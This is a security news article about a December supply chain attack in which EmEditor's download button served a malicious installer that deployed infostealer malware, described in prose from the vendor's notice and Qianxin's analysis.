The popular text and code editing software EmEditor was recently targeted in a supply chain attack that resulted in the distribution of infostealer malware.
Developed by Redmond-based Emurasoft, Inc., EmEditor is a high-performance Windows tool designed for coding, text editing, and processing large files.
In a security incident notice posted on the official website on December 22, the software’s developers warned that individuals who had downloaded EmEditor using the ‘download now’ button between December 19, 18:39 PT, and December 22, 12:50 PT, may have been served a malicious installer.
“If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe,” the notice reads.
Based on Emurasoft’s analysis, the URL behind the ‘Download Now’ button was changed to point to a malicious .msi file hosted in a different location on the EmEditor website.
The fake installer had the same name and was similar in size to the genuine installer, but was signed with a certificate belonging to a different company.
When run, the malicious installer executed a PowerShell command designed to download and execute a file from a fake EmEditor domain.
The Chinese cybersecurity company Qianxin has investigated the attack and warned enterprises and government organizations about the potential threat. The security firm noted that the editor has a significant user base in China.
Qianxin’s analysis showed that the malicious .msi file contained a script designed to collect system information, along with files from the Desktop, Documents, and Downloads folders. Data such as VPN configurations, browser information, and credentials for Windows and applications such as Zoho Mail, Discord, Slack, Teams, Zoom, WinSCP, PuTTY, Telegram, and Steam are also collected.
The security firm pointed out that the malware checks the system’s language, and it terminates if it’s set to former Soviet countries or Iran.
Qianxin researchers also found that once it collects information, the malicious script deploys a browser extension named ‘Google Drive Caching’, which has been described as a fully-featured information-stealing malware.
This malicious extension is used for persistence and enables the attackers to collect system information, browser history and bookmarks, and cookies.
In addition, the extension has clipboard hijacking functionality that enables it to replace cryptocurrency addresses with ones owned by the attacker. It’s also capable of logging keystrokes and stealing Facebook ad accounts.
Qianxin has not shared any information on attribution, but its description suggests that the supply chain attack was conducted by profit-driven cybercriminals rather than a state-sponsored APT. However, the cybersecurity industry says the lines between the two threat actor categories are increasingly blurred.
Indicators of compromise (IoCs) for the EmEditor attack are available from Qianxin and Emurasoft.
Related: 640 NPM Packages Infected in New ‘Shai-Hulud’ Supply Chain Attack
Related: Chinese Cyberspies Deploy ‘BadAudio’ Malware via Supply Chain Attacks
Related: Supply Chain Attack Targets VS Code Extensions With ‘GlassWorm’ Malware
